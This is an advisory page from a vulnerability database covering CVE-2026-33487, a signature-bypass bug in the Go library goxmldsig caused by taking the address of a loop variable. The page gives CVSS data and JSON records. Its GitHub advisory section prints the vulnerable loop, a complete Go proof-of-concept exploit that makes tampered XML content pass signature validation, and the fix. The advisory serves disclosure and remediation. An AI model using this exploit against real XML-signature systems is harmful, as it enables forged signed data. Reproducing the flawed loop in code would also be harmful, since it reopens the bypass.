Vulnerability-Lookup

CVE-2026-33487 (GCVE-0-2026-33487)

Vulnerability from cvelistv5 – Published: 2026-03-26 17:17 – Updated: 2026-03-30 11:16

Title

goxmldsig has validateSignature Loop Variable Capture Signature Bypass

Summary

goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element's ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-347 - Improper Verification of Cryptographic Signature
CWE-682 - Incorrect Calculation

Assigner

GitHub_M

References

URL

Tags

https://github.com/russellhaering/goxmldsig/secur…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	russellhaering	goxmldsig	Affected: < 1.6.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33487",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-30T11:16:13.379400Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-30T11:16:34.970Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "goxmldsig",
          "vendor": "russellhaering",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.6.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element\u0027s ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-347",
              "description": "CWE-347: Improper Verification of Cryptographic Signature",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-682",
              "description": "CWE-682: Incorrect Calculation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-26T17:17:51.101Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc"
        }
      ],
      "source": {
        "advisory": "GHSA-479m-364c-43vc",
        "discovery": "UNKNOWN"
      },
      "title": "goxmldsig has validateSignature Loop Variable Capture Signature Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33487",
    "datePublished": "2026-03-26T17:17:51.101Z",
    "dateReserved": "2026-03-20T16:16:48.971Z",
    "dateUpdated": "2026-03-30T11:16:34.970Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33487\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T18:16:30.070\",\"lastModified\":\"2026-03-30T13:26:50.827\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element\u0027s ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch.\"},{\"lang\":\"es\",\"value\":\"goxmlsig proporciona Firmas Digitales XML implementadas en Go. Antes de la versi\u00f3n 1.6.0, la funci\u00f3n \u0027validateSignature\u0027 en \u0027validate.go\u0027 recorre las referencias en el bloque \u0027SignedInfo\u0027 para encontrar una que coincida con el ID del elemento firmado. En versiones de Go anteriores a la 1.22, o cuando \u0027go.mod\u0027 utiliza una versi\u00f3n anterior, existe un problema de captura de variable de bucle. El c\u00f3digo toma la direcci\u00f3n de la variable de bucle \u0027_ref\u0027 en lugar de su valor. Como resultado, si m\u00e1s de una referencia coincide con el ID o si la l\u00f3gica del bucle es incorrecta, el puntero \u0027ref\u0027 siempre terminar\u00e1 apuntando al \u00faltimo elemento en el slice \u0027SignedInfo.References\u0027 despu\u00e9s del bucle. goxmlsig versi\u00f3n 1.6.0 contiene un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-347\"},{\"lang\":\"en\",\"value\":\"CWE-682\"}]}],\"references\":[{\"url\":\"https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33487\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-30T11:16:13.379400Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-30T11:16:27.338Z\"}}], \"cna\": {\"title\": \"goxmldsig has validateSignature Loop Variable Capture Signature Bypass\", \"source\": {\"advisory\": \"GHSA-479m-364c-43vc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"russellhaering\", \"product\": \"goxmldsig\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.6.0\"}]}], \"references\": [{\"url\": \"https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc\", \"name\": \"https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element\u0027s ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-347\", \"description\": \"CWE-347: Improper Verification of Cryptographic Signature\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-682\", \"description\": \"CWE-682: Incorrect Calculation\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T17:17:51.101Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33487\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-30T11:16:34.970Z\", \"dateReserved\": \"2026-03-20T16:16:48.971Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T17:17:51.101Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33487

Vulnerability from fkie_nvd - Published: 2026-03-26 18:16 - Updated: 2026-03-30 13:26

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element\u0027s ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch."
    },
    {
      "lang": "es",
      "value": "goxmlsig proporciona Firmas Digitales XML implementadas en Go. Antes de la versi\u00f3n 1.6.0, la funci\u00f3n \u0027validateSignature\u0027 en \u0027validate.go\u0027 recorre las referencias en el bloque \u0027SignedInfo\u0027 para encontrar una que coincida con el ID del elemento firmado. En versiones de Go anteriores a la 1.22, o cuando \u0027go.mod\u0027 utiliza una versi\u00f3n anterior, existe un problema de captura de variable de bucle. El c\u00f3digo toma la direcci\u00f3n de la variable de bucle \u0027_ref\u0027 en lugar de su valor. Como resultado, si m\u00e1s de una referencia coincide con el ID o si la l\u00f3gica del bucle es incorrecta, el puntero \u0027ref\u0027 siempre terminar\u00e1 apuntando al \u00faltimo elemento en el slice \u0027SignedInfo.References\u0027 despu\u00e9s del bucle. goxmlsig versi\u00f3n 1.6.0 contiene un parche."
    }
  ],
  "id": "CVE-2026-33487",
  "lastModified": "2026-03-30T13:26:50.827",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-26T18:16:30.070",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-347"
        },
        {
          "lang": "en",
          "value": "CWE-682"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-479M-364C-43VC

Vulnerability from github – Published: 2026-03-18 20:18 – Updated: 2026-03-27 20:58

Summary

validateSignature Loop Variable Capture Signature Bypass in goxmldsig

Details

The validateSignature function in validate.go goes through the references in the SignedInfo block to find one that matches the signed element's ID. In Go versions before 1.22, or when go.mod uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable _ref instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the ref pointer will always end up pointing to the last element in the SignedInfo.References slice after the loop.

Technical Details

The code takes the address of a loop iteration variable (&_ref). In the standard Go compiler, this variable is only allocated once for the whole loop, so its address stays the same, but its value changes with each iteration.

As a result, any pointer to this variable will always point to the value of the last element processed by the loop, no matter which element matched the search criteria.

Using Radare2, I found that the assembly at 0x1001c5908 (the start of the loop) loads the iteration values but does not create a new allocation (runtime.newobject) for the variable _ref inside the loop. The address &_ref stays the same during the loop (due to stack or heap slot reuse), which confirms the pointer aliasing issue.

// goxmldsig/validate.go (Lines 309-313)    
for _, _ref := range signedInfo.References {
        if _ref.URI == "" || _ref.URI[1:] == idAttr {
            ref = &_ref // <- Capture var address of loop
        }
    }

PoC

The PoC generates a signed document containing two elements and confirms that altering the first element to match the second produces a valid signature.

package main

import (
    "crypto/rand"
    "crypto/rsa"
    "crypto/tls"
    "crypto/x509"
    "encoding/base64"
    "fmt"
    "math/big"
    "time"

    "github.com/beevik/etree"
    dsig "github.com/russellhaering/goxmldsig"
)

func main() {
    key, err := rsa.GenerateKey(rand.Reader, 2048)
    if err != nil {
        panic(err)
    }

    template := &x509.Certificate{
        SerialNumber: big.NewInt(1),
        NotBefore:    time.Now().Add(-1 * time.Hour),
        NotAfter:     time.Now().Add(1 * time.Hour),
    }

    certDER, err := x509.CreateCertificate(rand.Reader, template, template, &key.PublicKey, key)
    if err != nil {
        panic(err)
    }

    cert, _ := x509.ParseCertificate(certDER)

    doc := etree.NewDocument()
    root := doc.CreateElement("Root")
    root.CreateAttr("ID", "target")
    root.SetText("Malicious Content")

    tlsCert := tls.Certificate{
        Certificate: [][]byte{cert.Raw},
        PrivateKey:  key,
    }

    ks := dsig.TLSCertKeyStore(tlsCert)
    signingCtx := dsig.NewDefaultSigningContext(ks)

    sig, err := signingCtx.ConstructSignature(root, true)
    if err != nil {
        panic(err)
    }

    signedInfo := sig.FindElement("./SignedInfo")

    existingRef := signedInfo.FindElement("./Reference")
    existingRef.CreateAttr("URI", "#dummy")

    originalEl := etree.NewElement("Root")
    originalEl.CreateAttr("ID", "target")
    originalEl.SetText("Original Content")

    sig1, _ := signingCtx.ConstructSignature(originalEl, true)
    ref1 := sig1.FindElement("./SignedInfo/Reference").Copy()

    signedInfo.InsertChildAt(existingRef.Index(), ref1)

    c14n := signingCtx.Canonicalizer

    detachedSI := signedInfo.Copy()
    if detachedSI.SelectAttr("xmlns:"+dsig.DefaultPrefix) == nil {
        detachedSI.CreateAttr("xmlns:"+dsig.DefaultPrefix, dsig.Namespace)
    }

    canonicalBytes, err := c14n.Canonicalize(detachedSI)
    if err != nil {
        fmt.Println("c14n error:", err)
        return
    }

    hash := signingCtx.Hash.New()
    hash.Write(canonicalBytes)
    digest := hash.Sum(nil)

    rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
    if err != nil {
        panic(err)
    }

    sigVal := sig.FindElement("./SignatureValue")
    sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))

    certStore := &dsig.MemoryX509CertificateStore{
        Roots: []*x509.Certificate{cert},
    }
    valCtx := dsig.NewDefaultValidationContext(certStore)

    root.AddChild(sig)

    doc.SetRoot(root)
    str, _ := doc.WriteToString()
    fmt.Println("XML:")
    fmt.Println(str)

    validated, err := valCtx.Validate(root)
    if err != nil {
        fmt.Println("validation failed:", err)
    } else {
        fmt.Println("validation ok")
        fmt.Println("validated text:", validated.Text())
    }
}

Impact

This vulnerability lets an attacker get around integrity checks for certain signed elements by replacing their content with the content from another element that is also referenced in the same signature.

Remediation

Update the loop to capture the value correctly or use the index to reference the slice directly.

// goxmldsig/validate.go    
func (ctx *ValidationContext) validateSignature(el *etree.Element, sig *types.Signature) error {
    var ref *types.Reference

  // OLD
    // for _, _ref := range signedInfo.References {
    //  if _ref.URI == "" || _ref.URI[1:] == idAttr {
    //      ref = &_ref
    //  }
    // }

  // FIX
    for i := range signedInfo.References {
        if signedInfo.References[i].URI == "" ||
            signedInfo.References[i].URI[1:] == idAttr {
            ref = &signedInfo.References[i]
            break
        }
    }

    // ...
}

References

https://cwe.mitre.org/data/definitions/347.html

https://cwe.mitre.org/data/definitions/682.html

https://github.com/russellhaering/goxmldsig/blob/main/validate.go

Author: Tomas Illuminati

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.5.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/russellhaering/goxmldsig"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33487"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347",
      "CWE-682"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T20:18:22Z",
    "nvd_published_at": "2026-03-26T18:16:30Z",
    "severity": "HIGH"
  },
  "details": "### Details\n\nThe `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element\u0027s ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop.\n\n------\n\n### Technical Details\n\nThe code takes the address of a loop iteration variable (\u0026_ref). In the standard Go compiler, this variable is only allocated once for the whole loop, so its address stays the same, but its value changes with each iteration.\n\nAs a result, any pointer to this variable will always point to the value of the *last* element processed by the loop, no matter which element matched the search criteria.\n\nUsing Radare2, I found that the assembly at 0x1001c5908 (the start of the loop) loads the iteration values but does not create a new allocation (runtime.newobject) for the variable _ref inside the loop. The address \u0026_ref stays the same during the loop (due to stack or heap slot reuse), which confirms the pointer aliasing issue.\n\n```````go\n// goxmldsig/validate.go (Lines 309-313)\t\nfor _, _ref := range signedInfo.References {\n\t\tif _ref.URI == \"\" || _ref.URI[1:] == idAttr {\n\t\t\tref = \u0026_ref // \u003c- Capture var address of loop\n\t\t}\n\t}\n\n```````\n\n-----\n\n### PoC\n\nThe PoC generates a signed document containing two elements and confirms that altering the first element to match the second produces a valid signature.\n\n``````go\npackage main\n\nimport (\n\t\"crypto/rand\"\n\t\"crypto/rsa\"\n\t\"crypto/tls\"\n\t\"crypto/x509\"\n\t\"encoding/base64\"\n\t\"fmt\"\n\t\"math/big\"\n\t\"time\"\n\n\t\"github.com/beevik/etree\"\n\tdsig \"github.com/russellhaering/goxmldsig\"\n)\n\nfunc main() {\n\tkey, err := rsa.GenerateKey(rand.Reader, 2048)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\ttemplate := \u0026x509.Certificate{\n\t\tSerialNumber: big.NewInt(1),\n\t\tNotBefore:    time.Now().Add(-1 * time.Hour),\n\t\tNotAfter:     time.Now().Add(1 * time.Hour),\n\t}\n\n\tcertDER, err := x509.CreateCertificate(rand.Reader, template, template, \u0026key.PublicKey, key)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tcert, _ := x509.ParseCertificate(certDER)\n\n\tdoc := etree.NewDocument()\n\troot := doc.CreateElement(\"Root\")\n\troot.CreateAttr(\"ID\", \"target\")\n\troot.SetText(\"Malicious Content\")\n\n\ttlsCert := tls.Certificate{\n\t\tCertificate: [][]byte{cert.Raw},\n\t\tPrivateKey:  key,\n\t}\n\n\tks := dsig.TLSCertKeyStore(tlsCert)\n\tsigningCtx := dsig.NewDefaultSigningContext(ks)\n\n\tsig, err := signingCtx.ConstructSignature(root, true)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tsignedInfo := sig.FindElement(\"./SignedInfo\")\n\n\texistingRef := signedInfo.FindElement(\"./Reference\")\n\texistingRef.CreateAttr(\"URI\", \"#dummy\")\n\n\toriginalEl := etree.NewElement(\"Root\")\n\toriginalEl.CreateAttr(\"ID\", \"target\")\n\toriginalEl.SetText(\"Original Content\")\n\n\tsig1, _ := signingCtx.ConstructSignature(originalEl, true)\n\tref1 := sig1.FindElement(\"./SignedInfo/Reference\").Copy()\n\n\tsignedInfo.InsertChildAt(existingRef.Index(), ref1)\n\n\tc14n := signingCtx.Canonicalizer\n\n\tdetachedSI := signedInfo.Copy()\n\tif detachedSI.SelectAttr(\"xmlns:\"+dsig.DefaultPrefix) == nil {\n\t\tdetachedSI.CreateAttr(\"xmlns:\"+dsig.DefaultPrefix, dsig.Namespace)\n\t}\n\n\tcanonicalBytes, err := c14n.Canonicalize(detachedSI)\n\tif err != nil {\n\t\tfmt.Println(\"c14n error:\", err)\n\t\treturn\n\t}\n\n\thash := signingCtx.Hash.New()\n\thash.Write(canonicalBytes)\n\tdigest := hash.Sum(nil)\n\n\trawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tsigVal := sig.FindElement(\"./SignatureValue\")\n\tsigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))\n\n\tcertStore := \u0026dsig.MemoryX509CertificateStore{\n\t\tRoots: []*x509.Certificate{cert},\n\t}\n\tvalCtx := dsig.NewDefaultValidationContext(certStore)\n\n\troot.AddChild(sig)\n\n\tdoc.SetRoot(root)\n\tstr, _ := doc.WriteToString()\n\tfmt.Println(\"XML:\")\n\tfmt.Println(str)\n\n\tvalidated, err := valCtx.Validate(root)\n\tif err != nil {\n\t\tfmt.Println(\"validation failed:\", err)\n\t} else {\n\t\tfmt.Println(\"validation ok\")\n\t\tfmt.Println(\"validated text:\", validated.Text())\n\t}\n}\n``````\n\n-----\n\n### Impact\n\nThis vulnerability lets an attacker get around integrity checks for certain signed elements by replacing their content with the content from another element that is also referenced in the same signature.\n\n------\n\n### Remediation\n\nUpdate the loop to capture the value correctly or use the index to reference the slice directly.\n\n``````go\n// goxmldsig/validate.go\t\nfunc (ctx *ValidationContext) validateSignature(el *etree.Element, sig *types.Signature) error {\n\tvar ref *types.Reference\n\n  // OLD\n\t// for _, _ref := range signedInfo.References {\n\t// \tif _ref.URI == \"\" || _ref.URI[1:] == idAttr {\n\t// \t\tref = \u0026_ref\n\t// \t}\n\t// }\n\t\n  // FIX\n\tfor i := range signedInfo.References {\n\t\tif signedInfo.References[i].URI == \"\" ||\n\t\t\tsignedInfo.References[i].URI[1:] == idAttr {\n\t\t\tref = \u0026signedInfo.References[i]\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// ...\n}\n``````\n\n----\n\n### References\n\nhttps://cwe.mitre.org/data/definitions/347.html\n\nhttps://cwe.mitre.org/data/definitions/682.html\n\nhttps://github.com/russellhaering/goxmldsig/blob/main/validate.go\n\n-----\n\n**Author**: Tomas Illuminati",
  "id": "GHSA-479m-364c-43vc",
  "modified": "2026-03-27T20:58:00Z",
  "published": "2026-03-18T20:18:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-479m-364c-43vc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33487"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/russellhaering/goxmldsig"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "validateSignature Loop Variable Capture Signature Bypass in goxmldsig"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33487 (GCVE-0-2026-33487)

FKIE_CVE-2026-33487

GHSA-479M-364C-43VC

Details

Technical Details

PoC

Impact

Remediation

References

Tags

Sightings

Nomenclature